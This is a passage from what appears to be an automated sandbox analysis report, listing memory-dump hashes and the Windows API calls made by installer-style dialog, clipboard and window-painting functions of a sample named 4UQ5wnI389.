                                                                                                            • Opcode Fuzzy Hash: f351334cb10d03b60a344640294f2d11ff27d7fe619355777cc8687813d48ab8
                                                                                                            • Instruction Fuzzy Hash: 92C1C274E00218CFEB14DFA5D994B9DBBB2BF89304F1081A9D819AB354DB349E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8a4fb30261bdda5a705c90c46deb4cfd401e5241039fdb44cb726dd4d7415d00
                                                                                                            • Instruction ID: db32131a57e9f962506be8fd2f628d724a9b6cbbc51a6af2736aab891662be0a
                                                                                                            • Opcode Fuzzy Hash: 8a4fb30261bdda5a705c90c46deb4cfd401e5241039fdb44cb726dd4d7415d00
                                                                                                            • Instruction Fuzzy Hash: F3C1D174E00218CFEB14DFA9D994B9DBBB2BF89304F1081A9D809AB354DB349E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f40bfcbeaa1e2cb56f0d0c19480c1d8381273d434a12bce00b99414bdffac03e
                                                                                                            • Instruction ID: 573b5181bda6cf1f7bb3e0dee69ed83081619780403cab17e8cdecfc836e6fa1
                                                                                                            • Opcode Fuzzy Hash: f40bfcbeaa1e2cb56f0d0c19480c1d8381273d434a12bce00b99414bdffac03e
                                                                                                            • Instruction Fuzzy Hash: 49C1D374E00218CFEB14DFA5D994B9DBBB2BF89304F2081A9D809AB354DB349E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d4eade2030a4eaf2def85a144da380d00c8e08996e211740cf02e790bde1010d
                                                                                                            • Instruction ID: 06843137a8e5248ab73a6067017e28c71be053b6d5ca48926099ef32e870fc89
                                                                                                            • Opcode Fuzzy Hash: d4eade2030a4eaf2def85a144da380d00c8e08996e211740cf02e790bde1010d
                                                                                                            • Instruction Fuzzy Hash: 24C1D274E00218CFEB14DFA5D994B9DBBB2BF89304F6081A9D819AB354DB349E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 968ea4b20f95a71902df2a246f6b4079b9a848c3195a36823d546c3e13477b5a
                                                                                                            • Instruction ID: 6291fb2f5664644211abf3e73ba32c8971035029b92f7eb7a0f7d5c4b5ebf5ed
                                                                                                            • Opcode Fuzzy Hash: 968ea4b20f95a71902df2a246f6b4079b9a848c3195a36823d546c3e13477b5a
                                                                                                            • Instruction Fuzzy Hash: 0BC1D274E00218CFEB14DFA5D994B9DBBB2BF89304F6081A9D819AB354DB349E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e9e7ee6b59c87d0b0a13a72d1ee609ef41d6ebc66174eefdd5f738ef3c62dbb4
                                                                                                            • Instruction ID: 1b0381cf141d34c9d18cfedb5b42de951c0aa62a95ef4538f8de712e856fbc3d
                                                                                                            • Opcode Fuzzy Hash: e9e7ee6b59c87d0b0a13a72d1ee609ef41d6ebc66174eefdd5f738ef3c62dbb4
                                                                                                            • Instruction Fuzzy Hash: E8C1D274E00218CFEB14DFA5D994B9DBBB2BF89304F2081A9D809AB354DB359E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5b94c47caba57e367fc3d0d1d2f73a85a67ffcfb89dff5a600a13fabe0e89078
                                                                                                            • Instruction ID: 43c2cb0efa2b9a8c3cf6ace05b28de42f2fa336a8d28a54e4d4f9a281f7f7777
                                                                                                            • Opcode Fuzzy Hash: 5b94c47caba57e367fc3d0d1d2f73a85a67ffcfb89dff5a600a13fabe0e89078
                                                                                                            • Instruction Fuzzy Hash: 8DC1D274E00218CFEB14DFA9D994B9DBBB2BF89304F1081A9D809AB354DB359E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 40612dcbee818cf5323026814301744df94ed7044971ac5dfadd250ef8e58983
                                                                                                            • Instruction ID: 0325f85d7abf1ef89fb98816c48789aca42ca791d1bc25d2160d94e220ea309f
                                                                                                            • Opcode Fuzzy Hash: 40612dcbee818cf5323026814301744df94ed7044971ac5dfadd250ef8e58983
                                                                                                            • Instruction Fuzzy Hash: B7C1C374E00218CFEB14DFA5D994B9DBBB2BF89304F2081A9D819AB354DB359E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b1c1b4c70d38f9eae4fd1f7353db4b1b705cb5cd1ebb69e2a5a39909f4ba9e30
                                                                                                            • Instruction ID: 3083a97c99751b4f747e749eb3c7c9704c9e6c63cabe72752009c68f66b09fa4
                                                                                                            • Opcode Fuzzy Hash: b1c1b4c70d38f9eae4fd1f7353db4b1b705cb5cd1ebb69e2a5a39909f4ba9e30
                                                                                                            • Instruction Fuzzy Hash: C7C1D274E00218CFEB14DFA5D994B9DBBB2BF89304F5081A9D809AB354DB359E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d4909d6f439c40ba5a9c5f66a77117437e06a3acfd8bb2acc0e3aca8f2838f47
                                                                                                            • Instruction ID: c6edd22564c07895df60c28ab8144f860b2cbe3f505ff45d4963071719d6854c
                                                                                                            • Opcode Fuzzy Hash: d4909d6f439c40ba5a9c5f66a77117437e06a3acfd8bb2acc0e3aca8f2838f47
                                                                                                            • Instruction Fuzzy Hash: 92C1D374E00218CFEB14DFA5D994B9DBBB2BF89304F2081A9D809AB354DB359E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9ccdc07de07d5391dedc8050fda331eab5dc53be684293a614cbe741f956ed3c
                                                                                                            • Instruction ID: 61eb0908cbe3ee6768980e441933900e72e9ff1d83cfe63d7014ee7ca7430e57
                                                                                                            • Opcode Fuzzy Hash: 9ccdc07de07d5391dedc8050fda331eab5dc53be684293a614cbe741f956ed3c
                                                                                                            • Instruction Fuzzy Hash: FFC1D174E00218CFEB14DFA5D994B9DBBB2BF89304F2081A9D819AB354DB359E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745686553.0000000037A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A60000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37a60000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 30969bfb4531126ddadf74a78a233347eda34096e04da8e3c43eec2b1ef62d09
                                                                                                            • Instruction ID: feb73f5d080ab9e03f05bc0fc0e3e44563ce84743cf4fa4d60eeed6162a2accd
                                                                                                            • Opcode Fuzzy Hash: 30969bfb4531126ddadf74a78a233347eda34096e04da8e3c43eec2b1ef62d09
                                                                                                            • Instruction Fuzzy Hash: 4AC1D274E00218CFDB14DFA9D994B9DBBB2BF89304F2081A9D819AB354DB349E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745686553.0000000037A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A60000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37a60000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a2518d56ca5ff645d354744d756f980c64184ccd2b05525db62f1a393a2a869a
                                                                                                            • Instruction ID: ad175df8f2d8f2369d08266cc21e55d2bcdc5788958b241767e332466fc82149
                                                                                                            • Opcode Fuzzy Hash: a2518d56ca5ff645d354744d756f980c64184ccd2b05525db62f1a393a2a869a
                                                                                                            • Instruction Fuzzy Hash: 0AC1CF74E00218CFDB14DFA9D994B9DBBB2AF89304F2081A9D819AB355DB349E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745686553.0000000037A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A60000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37a60000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ee514abb18dcf7b8a74d4131da6f3924020b7af3de7c29df145ba87644b3601d
                                                                                                            • Instruction ID: 8f8fc7c12b9332c7ed41b03eff889859b50444849778a950d3dd9241a32abd64
                                                                                                            • Opcode Fuzzy Hash: ee514abb18dcf7b8a74d4131da6f3924020b7af3de7c29df145ba87644b3601d
                                                                                                            • Instruction Fuzzy Hash: E7C1C174E00218CFDB14DFA9D994B9DBBB2BF89304F2081A9D819AB355DB349E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2746168269.0000000038180000.00000040.00000800.00020000.00000000.sdmp, Offset: 38180000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_38180000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a7c2eb61c8487513b3a6ad0f7b469c6a7f4967b63956e1ef50db01910f8da3fd
                                                                                                            • Instruction ID: d134852e7222f4c04df83cfad68b25d4f34ade5646255906f3b151e6802e00a8
                                                                                                            • Opcode Fuzzy Hash: a7c2eb61c8487513b3a6ad0f7b469c6a7f4967b63956e1ef50db01910f8da3fd
                                                                                                            • Instruction Fuzzy Hash: 99D06775E042188BCB11DFA8E8442ECF770EB9A315F0125A6D558A7110D7715A908E56
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,00000403), ref: 004055ED
                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004055FC
                                                                                                            • GetClientRect.USER32(?,?), ref: 00405639
                                                                                                            • GetSystemMetrics.USER32(00000002), ref: 00405640
                                                                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
                                                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
                                                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
                                                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
                                                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
                                                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
                                                                                                            • ShowWindow.USER32(?,00000008), ref: 004056DC
                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004056FD
                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
                                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
                                                                                                            • GetDlgItem.USER32(?,000003F8), ref: 0040560B
                                                                                                              • Part of subcall function 00404394: SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2
                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 0040574F
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00405764
                                                                                                            • ShowWindow.USER32(00000000), ref: 00405788
                                                                                                            • ShowWindow.USER32(?,00000008), ref: 0040578D
                                                                                                            • ShowWindow.USER32(00000008), ref: 004057D7
                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
                                                                                                            • CreatePopupMenu.USER32 ref: 0040581C
                                                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
                                                                                                            • GetWindowRect.USER32(?,?), ref: 00405850
                                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
                                                                                                            • OpenClipboard.USER32(00000000), ref: 004058B1
                                                                                                            • EmptyClipboard.USER32 ref: 004058B7
                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 004058CD
                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
                                                                                                            • CloseClipboard.USER32 ref: 00405912
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717926385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2717907797.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717945007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717969676.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717997307.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                            • String ID: (7B${
                                                                                                            • API String ID: 590372296-525222780
                                                                                                            • Opcode ID: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
                                                                                                            • Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
                                                                                                            • Opcode Fuzzy Hash: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
                                                                                                            • Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68
                                                                                                            APIs
                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
                                                                                                            • ShowWindow.USER32(?), ref: 00403EDF
                                                                                                            • DestroyWindow.USER32 ref: 00403EF3
                                                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
                                                                                                            • GetDlgItem.USER32(?,?), ref: 00403F30
                                                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 00403F4B
                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00403FF9
                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00404003
                                                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
                                                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040406E
                                                                                                            • GetDlgItem.USER32(?,00000003), ref: 00404114
                                                                                                            • ShowWindow.USER32(00000000,?), ref: 00404135
                                                                                                            • EnableWindow.USER32(?,?), ref: 00404147
                                                                                                            • EnableWindow.USER32(?,?), ref: 00404162
                                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404178
                                                                                                            • EnableMenuItem.USER32(00000000), ref: 0040417F
                                                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404197
                                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
                                                                                                            • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
                                                                                                            • SetWindowTextW.USER32(?,00423728), ref: 004041E8
                                                                                                            • ShowWindow.USER32(?,0000000A), ref: 0040431C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717926385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2717907797.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717945007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717969676.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717997307.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                            • String ID: (7B
                                                                                                            • API String ID: 184305955-3251261122
                                                                                                            • Opcode ID: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
                                                                                                            • Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
                                                                                                            • Opcode Fuzzy Hash: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
                                                                                                            • Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D
                                                                                                            APIs
                                                                                                              • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                              • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                            • lstrcatW.KERNEL32(00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800,75573420,00435000,00000000), ref: 00403B59
                                                                                                            • lstrlenW.KERNEL32(004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800), ref: 00403BD9
                                                                                                            • lstrcmpiW.KERNEL32(004281D8,.exe,004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
                                                                                                            • GetFileAttributesW.KERNEL32(004281E0), ref: 00403BF7
                                                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00435800), ref: 00403C40
                                                                                                              • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                            • RegisterClassW.USER32(004291E0), ref: 00403C7D
                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
                                                                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
                                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
                                                                                                            • RegisterClassW.USER32(004291E0), ref: 00403D42
                                                                                                            • DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717926385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2717907797.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717945007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717969676.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717997307.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                            • String ID: (7B$.DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                            • API String ID: 1975747703-1425696872
                                                                                                            • Opcode ID: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
                                                                                                            • Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
                                                                                                            • Opcode Fuzzy Hash: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
                                                                                                            • Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D
                                                                                                            APIs
                                                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045BC
                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004045D0
                                                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045ED
                                                                                                            • GetSysColor.USER32(?), ref: 004045FE
                                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                                                                                            • lstrlenW.KERNEL32(?), ref: 0040461F
                                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                                                                                            • GetDlgItem.USER32(?,0000040A), ref: 0040469A
                                                                                                            • SendMessageW.USER32(00000000), ref: 004046A1
                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004046CC
                                                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                                                                                            • SetCursor.USER32(00000000), ref: 00404720
                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
                                                                                                            • SetCursor.USER32(00000000), ref: 0040473C
                                                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040476B
                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717926385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2717907797.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717945007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717969676.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717997307.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                            • String ID: N
                                                                                                            • API String ID: 3103080414-1130791706
                                                                                                            • Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                            • Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
                                                                                                            • Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                            • Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58
                                                                                                            APIs
                                                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                            • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717926385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2717907797.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717945007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717969676.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717997307.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                            • String ID: F
                                                                                                            • API String ID: 941294808-1304234792
                                                                                                            • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                            • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                                                                            • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                            • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 0040489F
